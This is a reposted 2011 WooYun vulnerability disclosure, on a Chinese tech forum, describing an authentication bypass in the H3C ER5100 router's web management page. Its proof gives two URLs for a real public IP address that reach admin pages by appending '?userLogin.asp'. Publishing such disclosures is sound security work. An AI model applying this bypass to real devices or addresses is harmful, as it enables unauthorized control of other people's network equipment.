标题: H3C ER5100 企业级双核宽带路由器 web管理页面存在验证漏洞 [打印本页]

---

作者: linda    时间: 2015-1-4 12:17     标题: H3C ER5100 企业级双核宽带路由器 web管理页面存在验证漏洞

漏洞概要
缺陷编号：        WooYun-2011-02268
漏洞标题：        H3C ER5100 企业级双核宽带路由器 web管理页面存在验证漏洞
相关厂商：        华三通信技术有限公司
漏洞作者：        128bit
提交时间：        2011-06-17 09:59
公开时间：        2011-06-17 10:27
漏洞类型：        权限控制绕过
危害等级：        高
自评Rank：        15
漏洞状态：        未联系到厂商或者厂商积极忽略
漏洞来源：        http://www.wooyun.org
Tags标签：       认证缺陷 认证设计不合理 认证绕过 路由器安全

漏洞详情披露状态：
2011-06-17：        积极联系厂商并且等待厂商认领中，细节不对外公开
2011-06-17：        厂商已经主动忽略漏洞，细节向公众公开

简要描述：H3C ER5100 企业级宽带路由器web管理页面存在验证漏洞，未经授权的访问者可以修改、重启，查看大部分系统配置。
详细说明：
漏洞证明：





http://222.223.5.218:8080/home.asp?userLogin.asp

http://222.223.5.218:8080/wan_NAT.asp?userLogin.asp




修复方案：
版权声明：转载请注明来源 128bit@乌云
漏洞回应
厂商回应：未能联系到厂商或者厂商积极拒绝
漏洞Rank：20 (WooYun评价)

原文：http://www.wooyun.org/bugs/wooyun-2010-02268

---

欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)

Powered by Discuz! 6.0.0